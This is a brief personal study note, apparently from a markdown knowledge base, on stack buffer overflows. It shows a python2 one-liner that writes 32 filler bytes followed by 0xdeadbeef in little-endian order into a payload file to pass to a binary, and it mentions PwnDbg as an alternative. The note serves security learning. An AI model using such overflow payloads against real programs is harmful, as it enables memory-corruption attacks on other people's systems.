sleeptoken/zettelkasten/Overwriting variables on the stack.md

 - `python2 -c 'print 32 * "A" + "\xef\xbe\xad\xde"' > payload` use the stript to add the o/p to a payload and pass it to the binary
 - `\xef\xbe\xad\xde` is for endianness

+Alternate method is to debug with [[GDB]]-PwnDbg mentioned in the gdb file.

 ### References